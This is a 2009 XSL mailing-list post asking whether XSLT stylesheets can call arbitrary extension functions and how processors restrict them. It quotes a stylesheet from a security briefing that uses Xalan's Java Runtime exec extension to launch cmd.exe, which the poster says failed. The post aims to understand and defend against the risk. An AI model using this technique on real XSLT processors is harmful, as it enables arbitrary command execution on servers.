Subject: [xsl] Can an XSLT document invoke arbitrary extension functions? From: "Costello, Roger L." <costello@xxxxxxxxx> Date: Mon, 26 Oct 2009 16:40:21 -0400 |
Hi Folks, Below is an XSLT transform that - supposedly - opens a DOS command prompt. I saw the XSLT transform in this [1] briefing (slide 132). I ran it. It doesn't work; it just produces an error. The briefing seems to suggest that XSLT is riddled with security leaks, as any XSLT transform can invoke pretty much any arbitrary function (apparently including, as the below XSLT transform shows, any arbitrary Windows function). Questions: 1. Should the below XSLT Transform work? (i.e. is there simply a minor bug in it, that when fixed, would make it operate as desired?) 2. Is there any control over the set of extension functions provided by XSLT processors? 3. How do you respond to the briefing's suggestions that XSLT is riddled with security leaks? (I realize this is a broad question; any thoughts you have would be appreciated) <?xml version="1.0"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" extension-element-prefixes="rt ob" version="1.0"> <xsl:template match="/"> <xsl:variable name="runTimeObject" select="rt:getRuntime()"/> <xsl:variable name="command" select="rt:exec($runTimeObject, 'c:\Windows\system32\cmd.exe')"/> <xsl:variable name="commandAsString" select="ob:toString($command)"/> <xsl:value-of select="$commandAsString"/> </xsl:template> </xsl:stylesheet> /Roger [1] https://www.isecpartners.com/files/iSEC_HILL_AttackingXMLSecurity_bh07.pdf
Current Thread |
---|
|
<- Previous | Index | Next -> |
---|---|---|
RE: [xsl] FOP flow question, W Charlton | Thread | Re: [xsl] Can an XSLT document invo, G. Ken Holman |
Re: [xsl] FOP flow question, G. Ken Holman | Date | Re: [xsl] Can an XSLT document invo, G. Ken Holman |
Month |